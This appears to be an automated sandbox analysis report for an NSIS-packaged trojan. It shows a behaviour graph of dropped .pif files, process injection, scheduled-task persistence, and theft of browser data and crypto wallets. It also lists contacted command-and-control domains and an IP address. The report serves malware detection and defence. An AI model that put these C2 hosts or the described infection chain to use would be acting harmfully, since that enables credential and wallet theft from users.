Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004F2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 18_2_004F2263
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004F1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 18_2_004F1C61
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436372 Sample: SecuriteInfo.com.Trojan.NSI... Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 61 zippyfinickysofwps.shop 2->61 63 hhnlUmHdzjZFqZYoOtpryMy.hhnlUmHdzjZFqZYoOtpryMy 2->63 77 Snort IDS alert for network traffic 2->77 79 Multi AV Scanner detection for domain / URL 2->79 81 Found malware configuration 2->81 83 10 other signatures 2->83 10 SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe 65 2->10         started        12 wscript.exe 1 2->12         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 17 cmd.exe 2 10->17         started        97 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->97 21 EduSpark.pif 12->21         started        23 EduSpark.pif 15->23         started        process6 file7 53 C:\Users\user\AppData\Local\...\Buffer.pif, PE32 17->53 dropped 69 Uses ping.exe to sleep 17->69 71 Drops PE files with a suspicious file extension 17->71 73 Uses schtasks.exe or at.exe to add and modify task schedules 17->73 75 Uses ping.exe to check the status of other devices and networks 17->75 25 Buffer.pif 4 17->25         started        29 PING.EXE 1 17->29         started        32 cmd.exe 2 17->32         started        34 7 other processes 17->34 signatures8 process9 dnsIp10 57 C:\Users\user\AppData\Local\...duSpark.pif, PE32 25->57 dropped 59 C:\Users\user\AppData\Local\...duSpark.js, ASCII 25->59 dropped 93 Drops PE files with a suspicious file extension 25->93 95 Injects a PE file into a foreign processes 25->95 36 Buffer.pif 25->36         started        40 cmd.exe 2 25->40         started        43 cmd.exe 1 25->43         started        45 Buffer.pif 25->45         started        67 127.0.0.1 unknown unknown 29->67 file11 signatures12 process13 dnsIp14 65 zippyfinickysofwps.shop 104.21.39.216, 443, 49739, 49740 CLOUDFLARENETUS United States 36->65 85 Query firmware table information (likely to detect VMs) 36->85 87 Found many strings related to Crypto-Wallets (likely being stolen) 36->87 89 Tries to harvest and steal browser information (history, passwords, etc) 36->89 91 Tries to steal Crypto Currency Wallets 36->91 55 C:\Users\user\AppData\...duSpark.url, MS 40->55 dropped 47 conhost.exe 40->47         started        49 conhost.exe 43->49         started        51 schtasks.exe 1 43->51         started        file15 signatures16 process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.39.216
 zippyfinickysofwps.shop United States
13335 CLOUDFLARENETUS true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
zippyfinickysofwps.shop 104.21.39.216 true
hhnlUmHdzjZFqZYoOtpryMy.hhnlUmHdzjZFqZYoOtpryMy unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://zippyfinickysofwps.shop/api true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
boredimperissvieos.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
sweetsquarediaslw.shop true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
miniaturefinerninewjs.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
plaintediousidowsko.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
acceptabledcooeprs.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
zippyfinickysofwps.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
obsceneclassyjuwks.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
holicisticscrarws.shop true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown